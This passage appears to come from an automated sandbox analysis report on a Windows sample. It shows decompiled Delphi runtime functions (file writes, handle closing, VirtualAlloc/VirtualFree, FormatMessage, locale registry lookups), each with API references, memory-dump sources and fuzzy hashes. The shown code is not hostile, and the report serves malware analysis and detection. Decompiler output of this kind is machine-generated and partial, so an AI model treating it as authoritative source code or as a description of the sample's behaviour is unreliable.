				 *_t11 = _t8;
				if( *_t11 == 0xffffffff) {
					_t8 = GetLastError();
					if(_t8 != 0) {
						return E0040C1E4( *_t13);
					}
				}
				return _t8;
			}

0x0040c32a
0x0040c32c
0x0040c330
0x0040c33f
0x0040c344
0x0040c349
0x0040c34b
0x0040c352
0x00000000
0x0040c356
0x0040c352
0x0040c35d

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 0040C33F
GetLastError.KERNEL32(?,00000000,?,00000001), ref: 0040C34B

Part of subcall function 0040C1E4: GetLastError.KERNEL32(0040C0A4,0040C287,?,?,00000000,?,0041187B,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040C1E7

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: b5bc04d13ce7e0f4b6f76b7c9c32d4ca4eee90dc55d430a3763c41653256f821
Instruction ID: 6bb32860de773fec7b433492fb75275ead893e8bd59b77a14ca8c87ab5f49da4
Opcode Fuzzy Hash: b5bc04d13ce7e0f4b6f76b7c9c32d4ca4eee90dc55d430a3763c41653256f821
Instruction Fuzzy Hash: E1E04FB1600210DFEB10EFB588C1B66B6D89F04368F098676EA15DF2C5E675CC00C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2F4, Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A2F4(int __eax, void* __edx) {
				LONG* _t5;
				void* _t8;

				_t2 = __eax;
				if(__edx >= 0) {
					_t8 = __edx + 1;
					_t5 = __eax;
					goto L2;
					do {
						do {
							L2:
						} while (InterlockedCompareExchange(_t5, 1, 0) != 0);
						_t1 =  &(_t5[1]); // 0x0
						_t2 = CloseHandle( *_t1); // executed
						_t5 =  &(_t5[2]);
						_t8 = _t8 - 1;
					} while (_t8 != 0);
				}
				return _t2;
			}

0x0040a2f4
0x0040a2fa
0x0040a2fc
0x0040a2fd
0x0040a2fd
0x0040a2ff
0x0040a2ff
0x0040a2ff
0x0040a309
0x0040a30d
0x0040a311
0x0040a316
0x0040a319
0x0040a319
0x0040a2ff
0x0040a31e

APIs

InterlockedCompareExchange.KERNEL32(00415CA4,00000001,00000000), ref: 0040A304
CloseHandle.KERNEL32(00000000,?,00415DA8,0040A354,00415DA8,00000000,00415DA4,00000000,?,0040B156,00000000,0040B2A9), ref: 0040A311

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCompareExchangeHandleInterlocked
String ID:
API String ID: 190309047-0
Opcode ID: be626e2ef2a55e18661b3a68549b16555cdf0c22c566df155ca2d3d5298791dd
Instruction ID: 4f59e876e8f462647f5b87e6077f489c8bd3fa80aa1a1c9cbd2e5d0525511eb3
Opcode Fuzzy Hash: be626e2ef2a55e18661b3a68549b16555cdf0c22c566df155ca2d3d5298791dd
Instruction Fuzzy Hash: C6D05EB265172023DA202AA91D81B56014C8B54758F0114BBBE01FA3C2E1BA8C6002A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C42C, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040C42C(intOrPtr* __eax, long __ecx, void* __edx, void* __ebp) {
				long _v16;
				void* __ebx;
				int _t6;
				intOrPtr* _t9;
				long _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t9 = __eax;
				_t6 = WriteFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
				if(_t6 == 0) {
					_t6 = E0040C1E4( *_t9);
				}
				if(_t15 != _v16) {
					_t6 = E0040C130(_t9, 0x1d);
				}
				return _t6;
			}

0x0040c42f
0x0040c430
0x0040c434
0x0040c443
0x0040c44a
0x0040c44e
0x0040c44e
0x0040c456
0x0040c45f
0x0040c45f
0x0040c468

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040C443

Part of subcall function 0040C1E4: GetLastError.KERNEL32(0040C0A4,0040C287,?,?,00000000,?,0041187B,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040C1E7

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 3f27af93616d44cafd920d86f12288abf041101562baca60bd8f4dd466a85639
Instruction ID: 5f691bc60c61b380f8ace00ad4bc758de0d67d566e919883e0a27f2df786f2ed
Opcode Fuzzy Hash: 3f27af93616d44cafd920d86f12288abf041101562baca60bd8f4dd466a85639
Instruction Fuzzy Hash: BAE01272704110ABDB10E75ED8C0F67A7DCDF85754F00817BB548DB256D574DC048AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF84, Relevance: 1.5, APIs: 1, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BF84(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00404DD4(_t10, _t7, _t17, _t20);
			}

0x0040bf8b
0x0040bfa3
0x0040bfab
0x0040bfaf
0x0040bfb8
0x0040bfaa
0x0040bfaa
0x0040bfaa
0x00000000
0x0040bfba
0x0040bfba
0x0040bfbe
0x00000000
0x00000000
0x0040bfbe
0x00000000
0x0040bfb8
0x0040bfd1

APIs

FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,0040C156,00000000,0040C1A7,?,0040C360), ref: 0040BFA3

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 78b631aa6f0c220d234d81b028a8f39ac27aaf547ccc31545c27bd411d18f62e
Instruction ID: 54a6effb2ad2d49ab466ee6a75d0bb386577af74ea474ee3005c175c4631f906
Opcode Fuzzy Hash: 78b631aa6f0c220d234d81b028a8f39ac27aaf547ccc31545c27bd411d18f62e
Instruction Fuzzy Hash: F8E0D8A075430316F22911144C03B7B1109CBC0B00FA08436B600EF3D9DBBE985986DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040B698, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040B698(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x40b6de);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E0040B62C(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E00404D24(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E0040B6E5);
				return L00404C88( &_v8);
			}

0x0040b69b
0x0040b6a2
0x0040b6a3
0x0040b6a8
0x0040b6ab
0x0040b6b3
0x0040b6c1
0x0040b6ca
0x0040b6cd
0x0040b6d0
0x0040b6dd

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,0040B6DE,?,?,00000000,?,0040B6F1,0040BA6E,00000000,0040BAB3,?,?,00000000,00000000), ref: 0040B6C1

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4d65c1aa47821c360c71166b3d4a266793d1786de3f7429b732c39a9dcd030f1
Instruction ID: a06aa6656fdad5e9dbbd83ce560a082ed6b537c9876e7170b744a42e3e33ef30
Opcode Fuzzy Hash: 4d65c1aa47821c360c71166b3d4a266793d1786de3f7429b732c39a9dcd030f1
Instruction Fuzzy Hash: B3E09271704308AFE701EB72DD5391DB3ECD789704BA2087AF900F3A81E67A9E00855C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2E0, Relevance: 1.5, APIs: 1, Instructions: 26
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C2E0(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E00404D24(__edx),  *(0x4129dc + (_a8 & 0x000000ff) * 4),  *(0x4129e8 + (_a4 & 0x000000ff) * 4), 0,  *(0x4129f8 + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}

0x0040c31d
0x0040c325

APIs

CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0040C31D

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 63fc4f49aec430f3829336a694d8165bea7383a72ca2888a76604ad14c713c38
Instruction ID: 13404cbe62acdba55d2813df6ef1882d8c39da72c30555add375271e33042dcc
Opcode Fuzzy Hash: 63fc4f49aec430f3829336a694d8165bea7383a72ca2888a76604ad14c713c38
Instruction Fuzzy Hash: 20E012B134416C2ED240969DAC51FA6779CA719715F008023F994DB281C0A6D9209AE8

Uniqueness

Uniqueness Score: -1.00%

Function 00405B48, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B48(void* __eax) {
				short _v532;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				WCHAR* _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E00405DE8(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}

0x00405b50
0x00405b56
0x00405b66
0x00405b6f
0x00405b74
0x00405b76
0x00405b7b
0x00405b80
0x00405b80
0x00405b7b
0x00405b8e

APIs

GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00405B66

Part of subcall function 00405DE8: GetModuleFileNameW.KERNEL32(00000000,?,00000105,?,00000000), ref: 00405E04
Part of subcall function 00405DE8: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 00405E24
Part of subcall function 00405DE8: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 00405E42
Part of subcall function 00405DE8: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 00405E60
Part of subcall function 00405DE8: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00405E7E
Part of subcall function 00405DE8: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F1C,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 00405EC7
Part of subcall function 00405DE8: RegQueryValueExW.ADVAPI32(?,00406110,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F1C,?,80000001), ref: 00405EE5
Part of subcall function 00405DE8: RegCloseKey.ADVAPI32(?,00405F23,00000000,?,?,00000000,00405F1C,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F16

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 8c9758be25788c771a96be9b96f2f469653191ca95e081fd4ab6892ed6ab7e97
Instruction ID: 514b741bebc9be100643021af33e25a7a2a1590cfa8c206c69565e72355c73da
Opcode Fuzzy Hash: 8c9758be25788c771a96be9b96f2f469653191ca95e081fd4ab6892ed6ab7e97
Instruction Fuzzy Hash: DBE0C971A007109FCB14DE58C8C5A5737E4AF08764F044A66AD14EF386D375E9108BD5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C410, Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C410(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E0040C1E4( *_t7);
				}
				return _t4;
			}

0x0040c411
0x0040c417
0x0040c41e
0x00000000
0x0040c422
0x0040c428

APIs

SetEndOfFile.KERNEL32(?,7FD80010,00411C36,00000000), ref: 0040C417

Part of subcall function 0040C1E4: GetLastError.KERNEL32(0040C0A4,0040C287,?,?,00000000,?,0041187B,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040C1E7

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: a3404d2f1f053cf2f3e86efe0e478a67ee0e867368918682c51ca0df89d9ab2f
Instruction ID: 6b5fd851a2480aff7a6dd7d3e712bfbbac8f25b2dfd40299735038a0fc5377eb
Opcode Fuzzy Hash: a3404d2f1f053cf2f3e86efe0e478a67ee0e867368918682c51ca0df89d9ab2f
Instruction Fuzzy Hash: C0C04CB1201100C7CB00ABEAD5C191666DC6A483083448176B504DF247D678D8108A25

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACDF, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040ACDF() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(E0040ACFD);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}

0x0040ace1
0x0040ace4
0x0040ace7
0x0040acf0
0x0040acf5

APIs

SetErrorMode.KERNEL32(?,0040ACFD), ref: 0040ACF0

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: fc285dc2b3e37b3a2430b6cb798d4d006232da26ef733131f1ea31aed88b1510
Instruction ID: 112f59639df773ce5e8ef13905132ba6fc2be3043f547875694a47c1d55f0219
Opcode Fuzzy Hash: fc285dc2b3e37b3a2430b6cb798d4d006232da26ef733131f1ea31aed88b1510
Instruction Fuzzy Hash: 1CB09B7764C7405EF705D695A41152863D8D7C47143A2C477F412D65C0D53D55104519

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACFB, Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACFB() {
				int _t3;
				void* _t4;

				_t3 = SetErrorMode( *(_t4 - 0xc)); // executed
				return _t3;
			}

0x0040acf0
0x0040acf5

APIs

SetErrorMode.KERNEL32(?,0040ACFD), ref: 0040ACF0

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e041ad833e26832a7a46faca488033c8bf34126b8d66408357392999026807de
Instruction ID: 0d6ffb28b60556907f55dc5a8f6c8d323e4632824e5f7ee3d30a7447b9079724
Opcode Fuzzy Hash: e041ad833e26832a7a46faca488033c8bf34126b8d66408357392999026807de
Instruction Fuzzy Hash: A5A0222AC0C200B3CE00F2E0800082C232C3A883003C2C8A23002B2080C03E80200A0B

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE24, Relevance: 1.3, APIs: 1, Instructions: 62
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CE24(void* __eax, void* __fp0) {
				char _v16;
				char _v20;
				void* _v28;
				void* _t29;
				void* _t32;
				void* _t40;
				void* _t50;
				long _t52;

				_t40 = __eax;
				if( *((intOrPtr*)(__eax + 8))() != 5) {
					E0040CC3C(1);
				}
				E00403250(_t40 + 0x14, 0x50);
				if(E0040D9D8(_t40 + 0x14, 0x50,  &_v16,  &_v20, 5) != 0) {
					E0040CC3C(3);
				}
				if(_v16 > 0x4000000) {
					E0040CC3C(7);
				}
				_t52 = _v20 + _v16;
				if(_t52 !=  *(_t40 + 0x68)) {
					E0040CDCC(_t40);
					_t32 = VirtualAlloc(0, _t52, 0x1000, 4); // executed
					_t50 = _t32;
					 *(_t40 + 0x64) = _t50;
					if(_t50 == 0) {
						E00409818();
					}
					 *(_t40 + 0x68) = _t52;
				}
				_t29 = E0040DA28(_t40 + 0x14,  *(_t40 + 0x64) + _v20,  *(_t40 + 0x64));
				 *((char*)(_t40 + 0x11)) = 1;
				return _t29;
			}

0x0040ce2a
0x0040ce3c
0x0040ce43
0x0040ce43
0x0040ce52
0x0040ce76
0x0040ce7d
0x0040ce7d
0x0040ce8a
0x0040ce91
0x0040ce91
0x0040ce9a
0x0040cea1
0x0040cea5
0x0040ceb4
0x0040ceb9
0x0040cebb
0x0040cec0
0x0040cec2
0x0040cec2
0x0040cec7
0x0040cec7
0x0040ced7
0x0040cedc
0x0040cee6

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0040CEB4

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1c33fdcd7db3a91dc0bea8e59b530216931318dc07da37a5218f5d87b59fbcef
Instruction ID: b6681b459df67ccd1e5ce076e039c9ae0ad0e44203837902a123d5042d1e434f
Opcode Fuzzy Hash: 1c33fdcd7db3a91dc0bea8e59b530216931318dc07da37a5218f5d87b59fbcef
Instruction Fuzzy Hash: 31117231604204DBDB10EF59D8C1B5B3798DF84319F00817AF949AB2C6D638D805CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401706, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00401706(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E0040165C();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x415ac4 = 0;
				return _t30;
			}

0x0040170a
0x0040170c
0x00401711
0x00401714
0x00401719
0x0040171d
0x00401723
0x00401727
0x0040172d
0x00401749
0x0040174d
0x00401750
0x00401752
0x0040175a
0x0040176e
0x00000000
0x00000000
0x00401775
0x0040177b
0x0040177d
0x0040177f
0x00000000
0x0040177f
0x00000000
0x0040177b
0x00401770
0x0040172f
0x00401737
0x0040173e
0x00401744
0x00401740
0x00401740
0x00401740
0x0040173e
0x00401783
0x00401785
0x0040178e
0x00401797
0x00401797
0x0040179a
0x004017aa

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401737
VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040175A
VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00401767

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$Free$Query
String ID:
API String ID: 778034434-0
Opcode ID: 1f8cc85d58d84fecc884ae731a3f0fa7b9dad45823223e1fb4daec084ce4bc2b
Instruction ID: b087b523a7cdde792340b118d0caba1a8ecc00495ea843c26d989cfd8e6ee0d2
Opcode Fuzzy Hash: 1f8cc85d58d84fecc884ae731a3f0fa7b9dad45823223e1fb4daec084ce4bc2b
Instruction Fuzzy Hash: D3F069343046009FD310DB2AC984B5BB7E5EFC8760F19C67AE9889B3A1D635DC02979A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2AC, Relevance: 1.3, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C2AC(signed int __edx) {
				void* _t3;
				void* _t4;
				void* _t6;
				signed int _t11;
				void* _t15;

				_t4 = E00403A8C(_t3, __edx);
				_t11 = __edx;
				_t15 = _t4;
				if( *((char*)(_t15 + 8)) != 0) {
					CloseHandle( *(_t15 + 4)); // executed
				}
				_t6 = E00403884(_t11 & 0x000000fc);
				if(_t11 > 0) {
					return E00403A34(_t15);
				}
				return _t6;
			}

0x0040c2ae
0x0040c2b3
0x0040c2b5
0x0040c2bb
0x0040c2c1
0x0040c2c1
0x0040c2cd
0x0040c2d4
0x00000000
0x0040c2d8
0x0040c2df

APIs

CloseHandle.KERNEL32(?), ref: 0040C2C1

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f207754768eb2adbf3d9bba580aefa7a1eecef27c8b5d337bcd18dd9ac0b30e3
Instruction ID: 52e0be0a24c7e9235cb3898ef0266e034d147dd7413e0674b114539fed1210a4
Opcode Fuzzy Hash: f207754768eb2adbf3d9bba580aefa7a1eecef27c8b5d337bcd18dd9ac0b30e3
Instruction Fuzzy Hash: 19D02B42B00A2003C21177FE44C128BA6884F0436AB084A7EB590E72D2D73CCE01439C

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDCC, Relevance: 1.3, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CDCC(void* __eax) {
				void* _t6;
				void* _t9;

				_t9 = __eax;
				 *((intOrPtr*)(__eax + 0x68)) = 0;
				_t6 =  *(__eax + 0x64);
				if(_t6 != 0) {
					VirtualFree(_t6, 0, 0x8000); // executed
					 *((intOrPtr*)(_t9 + 0x64)) = 0;
					return 0;
				}
				return _t6;
			}

0x0040cdcd
0x0040cdd1
0x0040cdd4
0x0040cdd9
0x0040cde3
0x0040cdea
0x00000000
0x0040cdea
0x0040cdee

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,0040CDB2), ref: 0040CDE3

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
